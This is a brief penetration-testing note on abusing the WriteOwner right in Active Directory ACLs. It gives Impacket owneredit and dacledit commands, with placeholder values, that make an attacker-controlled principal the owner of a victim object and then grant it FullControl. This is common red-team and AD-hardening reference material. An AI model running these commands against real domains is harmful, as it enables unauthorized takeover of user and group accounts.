Exploitation of Discretionary Access Control Lists (DACL) using the WriteOwner permission in Active Directory environments. The WriteOwner permission can be abused by an attacker to change the object owner to an attacker-controlled user and take over the object.

To change the ownership of the object, you may use Impacket's owneredit script:

[owneredit.py](<http://owneredit.py/>) -action write -owner 'owned_principal' -target 'victim' 'DOMAIN'/'USER':'PASSWORD' -dc-ip IP.OF.DOMAIN.CONTROLLER

Now that we are owner, we can grant Full Control over user/group:

impacket-dacledit -action 'write' -rights 'FullControl' -principal 'owned_principal' -target 'victim' 'DOMAIN'/'USER':'PASSWORD' -dc-ip IP.OF.DOMAIN.CONTROLLER